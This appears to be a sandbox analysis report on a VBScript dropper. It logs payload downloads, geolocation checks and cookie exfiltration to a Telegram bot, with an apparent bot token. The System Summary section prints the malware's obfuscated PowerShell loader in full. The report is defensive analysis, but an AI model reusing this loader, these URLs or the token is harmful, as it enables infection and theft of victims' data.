              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /top/Collegiant.pfb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: homaye-salamat.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /finish/jQBlCBkXqDn162.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: homaye-salamat.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:651689%0D%0ADate%20and%20Time:%2013/03/2025%20/%2018:06:17%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20651689%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: homaye-salamat.com
              Source: global trafficDNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
              Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
              Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
              Source: global trafficDNS traffic detected: DNS query: api.telegram.org
              Source: unknownHTTP traffic detected: POST /bot7328026738:AAH1IHU2hS9jcv-fByxTl7eMvqtctOYjBF8/sendDocument?chat_id=1503224244&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd62db31f18cb7Host: api.telegram.orgContent-Length: 740
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 12 Mar 2025 18:17:04 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
              Source: powershell.exe, 00000002.00000002.1188426413.000001597E99C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
              Source: wscript.exe, 00000000.00000003.895126082.0000019CAC8CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.894742371.0000019CAC8CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/1
              Source: wscript.exe, 00000000.00000003.894742371.0000019CAC8CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/d
              Source: wscript.exe, 00000000.00000002.1005096719.0000019CAA947000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1003489750.0000019CAA90E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
              Source: wscript.exe, 00000000.00000002.1005096719.0000019CAA947000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1003489750.0000019CAA90E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: wscript.exe, 00000000.00000003.895126082.0000019CAC862000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.895576597.0000019CAA9BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6a9813886ab46
              Source: wscript.exe, 00000000.00000002.1005096719.0000019CAA947000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1003489750.0000019CAA90E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabv
              Source: wscript.exe, 00000000.00000003.902092381.0000019CAA9AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.895576597.0000019CAA98D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?6a9813886a
              Source: powershell.exe, 00000002.00000002.1188426413.000001597E99C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://microsoft.co
              Source: powershell.exe, 00000002.00000002.1181162714.000001597638D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000002.00000002.1156217112.0000015966547000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.1156217112.0000015966321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000002.00000002.1156217112.0000015966547000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.1188426413.000001597E99C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cz:
              Source: powershell.exe, 00000002.00000002.1156217112.0000015966321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000002.00000002.1181162714.000001597638D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.1181162714.000001597638D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.1181162714.000001597638D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000002.00000002.1156217112.0000015966547000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.c
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.co
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1156217112.0000015966547000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/t
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/to
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/C
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Co
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Col
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Coll
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Colle
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Colleg
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Collegi
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Collegia
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Collegian
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Collegiant
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Collegiant.
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Collegiant.p
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Collegiant.pf
              Source: powershell.exe, 00000002.00000002.1156217112.0000015967783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Collegiant.pfb
              Source: powershell.exe, 00000002.00000002.1156217112.0000015966547000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://homaye-salamat.com/top/Collegiant.pfbP
              Source: powershell.exe, 00000002.00000002.1181162714.000001597638D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: unknownNetwork traffic detected: HTTP traffic on port 51190 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51192 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51205
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
              Source: unknownNetwork traffic detected: HTTP traffic on port 51205 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51196 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51189
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
              Source: unknownNetwork traffic detected: HTTP traffic on port 51194 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51187
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51192
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51190
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51196
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51194
              Source: unknownNetwork traffic detected: HTTP traffic on port 51189 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51200 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51187 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51202 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51204 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51206 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51198
              Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 51198 -> 443
              Source: unknownHTTPS traffic detected: 185.10.75.23:443 -> 192.168.2.9:49685 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.10.75.23:443 -> 192.168.2.9:51187 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:51205 version: TLS 1.2

              System Summary

              barindex
              Source: amsi32_5352.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 6652, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Payment_Advise.vbsStatic file information: Suspicious name
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoPr
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Klunketid; function Pachyhematous214($Rearrangdrr){$Blodprocenten=4;do{$Holderes+=$Rearrangdrr[$Blodprocenten];$Blodprocenten+=5;$Contakia=Format-List} until(!$Rearrangdrr[$Blodprocenten])$Holderes}function Verdensbermthedernes242($Pseudophilanthropic168){ .($Chiropractic) ($Pseudophilanthropic168)}$Signe=Pachyhematous214 ' rorN erveSnagt Po .B,asw';$Signe+=Pachyhematous214 ' m,aeBj,kBColoCRestlAntiIInd eBefrN anT';$Beetle=Pachyhematous214 'UnstMf,rfo reuzAm.eiLamblUligl assaTaka/';$Netstrmforsyningens=Pachyhematous214 ' fbaTGennlWatesUnmi1,ate2';$Disvisor='Knor[ Invn .lde SupT Avo.Ham.S orkE Hypr IdeVafbii nyCNet.eStyrPVileOSm gI onrN anTC tam Ud aKrafN,malAWastgCleaE IfrRNedg]Gall:phal:CogiSRappePtercBumfuAntarH emI.aksTvideyLibePServRBricoRe kTDyngo,ospcAgorOmysiLCyno=Sasc$,fhenForeEPolyt RivsMitht Ek.rA coMVa,bfko tOUnderAnfasAn ry NicnR neISyntnTilsgS phesocin Lets';$Beetle+=Pachyhematous214 ',amu5Outf.Skam0 Kon Aadr(Opi WskediC,ounFagldUncoo inawOstrsAdri blaNIndlT.ofa Ut.1Ops.0Part.Unda0Jt e;Regi UnwhWshipiSkolnKvge6Expa4aart;R su Noex Bl 6C ro4Con ;Ma.n .unirStenvAkse: S d1 Bek3Lix 4Pr v. P.r0Stoo)svar AnsvGYngleBaglcMusckTrano Inf/Snub2Grov0Pro 1Cler0Cons0 Ibs1Time0Vam 1u th PriFF rsiHerbr Fo,e PlefDipooRappxReth/Beha1Aest3Maxi4genz.Foli0';$Troppes=Pachyhematous214 'KhaluBoufs,eciedrplRR gi-TrysaProlGSed,eRundNMisst';$Imperativ=Pachyhematous214 'Flugh Hv tC ret DehpRejfsBlyh:Bryd/Semi/Vegeh orioPr,vmd scaIndiy SeteLunk-sco sLeiba,aemlMlleaPagem.ogfaFlogtSand.ce tcUgeno U,dmk gl/ nprtSparoSystpPerq/,oniC Su.o esklP,ptl UbeeOutbgSaaliLullabespnN.utt Rr,.BorepTa efAmalb';$afkalkningsanlgget=Pachyhematous214 'Sche>';$Chiropractic=Pachyhematous214 'DistIGorbEAureX';$Neuronic='Afrydningen';$Afgrdevalg219='\Toldeftersyn.Man';Verdensbermthedernes242 (Pachyhematous214 ' Exo$ KaigSydsL AgeOB rdbavalaDemoLbala:.yaeGFac LNobeY idfnAgly= .ar$HydrE SeinF,agV fo :Coawa e tpAeonp lunDUdstAmanvts,lua lis+Indi$Chefa,equFPaamg CreR .dmDF reE ,ukvDolkASamfLKumagHvid2n ni1Hete9');Verdensbermthedernes242 (Pachyhematous214 'Sed $D.pogS.dbLmuddO U obDeliASkoslR.pi:Hj,mt RehOlebeF Ne OTingr RepeMono=Unim$GameiJingm R np lysELu,er Lina o.at aceiDyppV Non.H,ves SpopHalclRillIexogtCalc( lgo$u unAVrelf,reskGigmADundLHaemKE penEsquiLydsN I sgSycosMetaANoteNUngdl RasgbatiG IsiEPseuTHepa)');Verdensbermthedernes242 (Pachyhematous214 $Disvisor);$Imperativ=$Tofore[0];$Optllingens=(Pachyhematous214 'Cann$ HanGInfalFomeo ndbPatcAT lslBo i:GelaB,omieMonoTJagtA SublVareiT.winGratGOr asSoffE St vStumNTranEBi e=GalaNsocrEUrosWsjus-lslaO S obAntijPhy eCroscafslt T i S ftSSultYGue.S theTSecrepennm op .Ido.$Civis,ormIOverGVelsn Pare');Verdensbermthedernes242 ($Optllingens);Verdensbermthedernes242 (Pachyhematous214 ' G n$ReplBPer,e Last O eaGamel orsiOmphn ,olgOr lsvir eVal v DvbnIndseVejr.RankHR.tiev caa D,dd aaeSubarHvorsBlac[ B,s$MacrTNeurrSupeoPrJump to behavior
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9C1A3B9412_2_00007FF9C1A3B941
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9C1A3AB912_2_00007FF9C1A3AB91
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9C1B09EFA2_2_00007FF9C1B09EFA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF9C1B0A70A2_2_00007FF9C1B0A70A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287D27817_2_0287D278
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287537017_2_02875370
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287C19E17_2_0287C19E
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287C73817_2_0287C738
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287C46817_2_0287C468
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287CA0817_2_0287CA08
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287E98817_2_0287E988
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287CFA917_2_0287CFA9
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287CCD817_2_0287CCD8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287A08817_2_0287A088
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287711817_2_02877118
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287F63017_2_0287F630
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287FA8817_2_0287FA88
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_028769A017_2_028769A0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_028739EF17_2_028739EF
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_028729EC17_2_028729EC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_0287E97A17_2_0287E97A
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_02873E0917_2_02873E09
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D185017_2_252D1850
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D1FA817_2_252D1FA8
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DE7D017_2_252DE7D0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D2A9017_2_252D2A90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DF92217_2_252DF922
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DF93017_2_252DF930
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D514817_2_252D5148
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D9D8917_2_252D9D89
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D9D9017_2_252D9D90
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DCDC017_2_252DCDC0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DEC2817_2_252DEC28
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DEC1817_2_252DEC18
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D001317_2_252D0013
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DF07117_2_252DF071
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D944817_2_252D9448
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D184117_2_252D1841
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252D004017_2_252D0040
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 17_2_252DF08017_2_252DF080
